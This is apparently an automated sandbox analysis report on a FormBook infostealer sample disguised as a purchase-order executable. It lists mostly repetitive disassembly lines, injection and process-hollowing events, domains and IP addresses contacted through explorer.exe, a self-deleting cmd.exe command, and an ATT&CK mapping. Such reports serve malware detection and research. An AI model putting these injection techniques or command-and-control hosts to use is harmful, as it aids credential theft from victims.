Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDAD30 mov eax, dword ptr fs:[00000030h]	9_2_04BDAD30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BFC577 mov eax, dword ptr fs:[00000030h]	9_2_04BFC577
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BFC577 mov eax, dword ptr fs:[00000030h]	9_2_04BFC577
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BF7D50 mov eax, dword ptr fs:[00000030h]	9_2_04BF7D50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C9E539 mov eax, dword ptr fs:[00000030h]	9_2_04C9E539
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C5A537 mov eax, dword ptr fs:[00000030h]	9_2_04C5A537
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C04D3B mov eax, dword ptr fs:[00000030h]	9_2_04C04D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C04D3B mov eax, dword ptr fs:[00000030h]	9_2_04C04D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C04D3B mov eax, dword ptr fs:[00000030h]	9_2_04C04D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA8D34 mov eax, dword ptr fs:[00000030h]	9_2_04CA8D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C18EC7 mov eax, dword ptr fs:[00000030h]	9_2_04C18EC7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C8FEC0 mov eax, dword ptr fs:[00000030h]	9_2_04C8FEC0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C036CC mov eax, dword ptr fs:[00000030h]	9_2_04C036CC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA8ED6 mov eax, dword ptr fs:[00000030h]	9_2_04CA8ED6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C016E0 mov ecx, dword ptr fs:[00000030h]	9_2_04C016E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C6FE87 mov eax, dword ptr fs:[00000030h]	9_2_04C6FE87
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE76E2 mov eax, dword ptr fs:[00000030h]	9_2_04BE76E2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C546A7 mov eax, dword ptr fs:[00000030h]	9_2_04C546A7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA0EA5 mov eax, dword ptr fs:[00000030h]	9_2_04CA0EA5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA0EA5 mov eax, dword ptr fs:[00000030h]	9_2_04CA0EA5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA0EA5 mov eax, dword ptr fs:[00000030h]	9_2_04CA0EA5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C9AE44 mov eax, dword ptr fs:[00000030h]	9_2_04C9AE44
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C9AE44 mov eax, dword ptr fs:[00000030h]	9_2_04C9AE44
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDE620 mov eax, dword ptr fs:[00000030h]	9_2_04BDE620
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDC600 mov eax, dword ptr fs:[00000030h]	9_2_04BDC600
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDC600 mov eax, dword ptr fs:[00000030h]	9_2_04BDC600
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDC600 mov eax, dword ptr fs:[00000030h]	9_2_04BDC600
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C08E00 mov eax, dword ptr fs:[00000030h]	9_2_04C08E00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91608 mov eax, dword ptr fs:[00000030h]	9_2_04C91608
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BFAE73 mov eax, dword ptr fs:[00000030h]	9_2_04BFAE73
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BFAE73 mov eax, dword ptr fs:[00000030h]	9_2_04BFAE73
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BFAE73 mov eax, dword ptr fs:[00000030h]	9_2_04BFAE73
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BFAE73 mov eax, dword ptr fs:[00000030h]	9_2_04BFAE73
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BFAE73 mov eax, dword ptr fs:[00000030h]	9_2_04BFAE73
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE766D mov eax, dword ptr fs:[00000030h]	9_2_04BE766D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0A61C mov eax, dword ptr fs:[00000030h]	9_2_04C0A61C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0A61C mov eax, dword ptr fs:[00000030h]	9_2_04C0A61C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C8FE3F mov eax, dword ptr fs:[00000030h]	9_2_04C8FE3F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]	9_2_04BE7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]	9_2_04BE7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]	9_2_04BE7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]	9_2_04BE7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]	9_2_04BE7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE7E41 mov eax, dword ptr fs:[00000030h]	9_2_04BE7E41
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE8794 mov eax, dword ptr fs:[00000030h]	9_2_04BE8794
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C137F5 mov eax, dword ptr fs:[00000030h]	9_2_04C137F5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C57794 mov eax, dword ptr fs:[00000030h]	9_2_04C57794
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C57794 mov eax, dword ptr fs:[00000030h]	9_2_04C57794
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C57794 mov eax, dword ptr fs:[00000030h]	9_2_04C57794
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD4F2E mov eax, dword ptr fs:[00000030h]	9_2_04BD4F2E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD4F2E mov eax, dword ptr fs:[00000030h]	9_2_04BD4F2E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA8F6A mov eax, dword ptr fs:[00000030h]	9_2_04CA8F6A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BFF716 mov eax, dword ptr fs:[00000030h]	9_2_04BFF716
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA070D mov eax, dword ptr fs:[00000030h]	9_2_04CA070D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA070D mov eax, dword ptr fs:[00000030h]	9_2_04CA070D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0A70E mov eax, dword ptr fs:[00000030h]	9_2_04C0A70E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0A70E mov eax, dword ptr fs:[00000030h]	9_2_04C0A70E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C6FF10 mov eax, dword ptr fs:[00000030h]	9_2_04C6FF10
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C6FF10 mov eax, dword ptr fs:[00000030h]	9_2_04C6FF10
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BEFF60 mov eax, dword ptr fs:[00000030h]	9_2_04BEFF60
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0E730 mov eax, dword ptr fs:[00000030h]	9_2_04C0E730
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BEEF40 mov eax, dword ptr fs:[00000030h]	9_2_04BEEF40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C6B8D0 mov eax, dword ptr fs:[00000030h]	9_2_04C6B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C6B8D0 mov ecx, dword ptr fs:[00000030h]	9_2_04C6B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C6B8D0 mov eax, dword ptr fs:[00000030h]	9_2_04C6B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C6B8D0 mov eax, dword ptr fs:[00000030h]	9_2_04C6B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C6B8D0 mov eax, dword ptr fs:[00000030h]	9_2_04C6B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C6B8D0 mov eax, dword ptr fs:[00000030h]	9_2_04C6B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD9080 mov eax, dword ptr fs:[00000030h]	9_2_04BD9080
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C53884 mov eax, dword ptr fs:[00000030h]	9_2_04C53884
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C53884 mov eax, dword ptr fs:[00000030h]	9_2_04C53884
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD58EC mov eax, dword ptr fs:[00000030h]	9_2_04BD58EC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD40E1 mov eax, dword ptr fs:[00000030h]	9_2_04BD40E1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD40E1 mov eax, dword ptr fs:[00000030h]	9_2_04BD40E1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD40E1 mov eax, dword ptr fs:[00000030h]	9_2_04BD40E1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]	9_2_04C020A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]	9_2_04C020A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]	9_2_04C020A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]	9_2_04C020A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]	9_2_04C020A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C020A0 mov eax, dword ptr fs:[00000030h]	9_2_04C020A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C190AF mov eax, dword ptr fs:[00000030h]	9_2_04C190AF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0F0BF mov ecx, dword ptr fs:[00000030h]	9_2_04C0F0BF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0F0BF mov eax, dword ptr fs:[00000030h]	9_2_04C0F0BF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0F0BF mov eax, dword ptr fs:[00000030h]	9_2_04C0F0BF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BEB02A mov eax, dword ptr fs:[00000030h]	9_2_04BEB02A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BEB02A mov eax, dword ptr fs:[00000030h]	9_2_04BEB02A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BEB02A mov eax, dword ptr fs:[00000030h]	9_2_04BEB02A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BEB02A mov eax, dword ptr fs:[00000030h]	9_2_04BEB02A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C92073 mov eax, dword ptr fs:[00000030h]	9_2_04C92073
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA1074 mov eax, dword ptr fs:[00000030h]	9_2_04CA1074
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C57016 mov eax, dword ptr fs:[00000030h]	9_2_04C57016
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C57016 mov eax, dword ptr fs:[00000030h]	9_2_04C57016
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C57016 mov eax, dword ptr fs:[00000030h]	9_2_04C57016
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA4015 mov eax, dword ptr fs:[00000030h]	9_2_04CA4015
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA4015 mov eax, dword ptr fs:[00000030h]	9_2_04CA4015
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0002D mov eax, dword ptr fs:[00000030h]	9_2_04C0002D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0002D mov eax, dword ptr fs:[00000030h]	9_2_04C0002D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0002D mov eax, dword ptr fs:[00000030h]	9_2_04C0002D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0002D mov eax, dword ptr fs:[00000030h]	9_2_04C0002D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0002D mov eax, dword ptr fs:[00000030h]	9_2_04C0002D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BF0050 mov eax, dword ptr fs:[00000030h]	9_2_04BF0050
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BF0050 mov eax, dword ptr fs:[00000030h]	9_2_04BF0050
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C641E8 mov eax, dword ptr fs:[00000030h]	9_2_04C641E8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BFC182 mov eax, dword ptr fs:[00000030h]	9_2_04BFC182
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0A185 mov eax, dword ptr fs:[00000030h]	9_2_04C0A185
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C02990 mov eax, dword ptr fs:[00000030h]	9_2_04C02990
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDB1E1 mov eax, dword ptr fs:[00000030h]	9_2_04BDB1E1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDB1E1 mov eax, dword ptr fs:[00000030h]	9_2_04BDB1E1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDB1E1 mov eax, dword ptr fs:[00000030h]	9_2_04BDB1E1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C061A0 mov eax, dword ptr fs:[00000030h]	9_2_04C061A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C061A0 mov eax, dword ptr fs:[00000030h]	9_2_04C061A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C569A6 mov eax, dword ptr fs:[00000030h]	9_2_04C569A6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C949A4 mov eax, dword ptr fs:[00000030h]	9_2_04C949A4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C949A4 mov eax, dword ptr fs:[00000030h]	9_2_04C949A4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C949A4 mov eax, dword ptr fs:[00000030h]	9_2_04C949A4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C949A4 mov eax, dword ptr fs:[00000030h]	9_2_04C949A4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C551BE mov eax, dword ptr fs:[00000030h]	9_2_04C551BE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C551BE mov eax, dword ptr fs:[00000030h]	9_2_04C551BE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C551BE mov eax, dword ptr fs:[00000030h]	9_2_04C551BE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C551BE mov eax, dword ptr fs:[00000030h]	9_2_04C551BE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BF4120 mov eax, dword ptr fs:[00000030h]	9_2_04BF4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BF4120 mov eax, dword ptr fs:[00000030h]	9_2_04BF4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BF4120 mov eax, dword ptr fs:[00000030h]	9_2_04BF4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BF4120 mov eax, dword ptr fs:[00000030h]	9_2_04BF4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BF4120 mov ecx, dword ptr fs:[00000030h]	9_2_04BF4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD9100 mov eax, dword ptr fs:[00000030h]	9_2_04BD9100
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD9100 mov eax, dword ptr fs:[00000030h]	9_2_04BD9100
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD9100 mov eax, dword ptr fs:[00000030h]	9_2_04BD9100
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDB171 mov eax, dword ptr fs:[00000030h]	9_2_04BDB171
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDB171 mov eax, dword ptr fs:[00000030h]	9_2_04BDB171
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDC962 mov eax, dword ptr fs:[00000030h]	9_2_04BDC962
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0513A mov eax, dword ptr fs:[00000030h]	9_2_04C0513A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0513A mov eax, dword ptr fs:[00000030h]	9_2_04C0513A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BFB944 mov eax, dword ptr fs:[00000030h]	9_2_04BFB944
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BFB944 mov eax, dword ptr fs:[00000030h]	9_2_04BFB944
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C02ACB mov eax, dword ptr fs:[00000030h]	9_2_04C02ACB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BEAAB0 mov eax, dword ptr fs:[00000030h]	9_2_04BEAAB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BEAAB0 mov eax, dword ptr fs:[00000030h]	9_2_04BEAAB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD52A5 mov eax, dword ptr fs:[00000030h]	9_2_04BD52A5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD52A5 mov eax, dword ptr fs:[00000030h]	9_2_04BD52A5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD52A5 mov eax, dword ptr fs:[00000030h]	9_2_04BD52A5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD52A5 mov eax, dword ptr fs:[00000030h]	9_2_04BD52A5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD52A5 mov eax, dword ptr fs:[00000030h]	9_2_04BD52A5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C02AE4 mov eax, dword ptr fs:[00000030h]	9_2_04C02AE4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0D294 mov eax, dword ptr fs:[00000030h]	9_2_04C0D294
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0D294 mov eax, dword ptr fs:[00000030h]	9_2_04C0D294
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0FAB0 mov eax, dword ptr fs:[00000030h]	9_2_04C0FAB0

Source: C:\Users\user\Desktop\PO 367628usa.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\PO 367628usa.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.bridgestreetresources.com
Source: C:\Windows\explorer.exe	Domain query: www.uuoouu-90.store
Source: C:\Windows\explorer.exe	Domain query: www.patricksparber.com
Source: C:\Windows\explorer.exe	Domain query: www.servantsheartvalet.com
Source: C:\Windows\explorer.exe	Domain query: www.meucamarimoficial.com
Source: C:\Windows\explorer.exe	Network Connect: 66.235.200.147 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.m-kenterprises.com
Source: C:\Windows\explorer.exe	Network Connect: 156.253.106.229 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 209.182.202.96 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\PO 367628usa.exe

Memory written: C:\Users\user\Desktop\PO 367628usa.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\PO 367628usa.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PO 367628usa.exe	Thread register set: target process: 3440			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Thread register set: target process: 3440			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PO 367628usa.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\PO 367628usa.exe

Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 950000

Jump to behavior

Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO 367628usa.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000002.590088493.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.590224656.0000000003460000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.590088493.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.590224656.0000000003460000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.590088493.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.590224656.0000000003460000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000006.00000002.590088493.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.590224656.0000000003460000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PO 367628usa.exe	Queries volume information: C:\Users\user\Desktop\PO 367628usa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO 367628usa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Masquerading1	Input Capture1	Security Software Discovery321	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
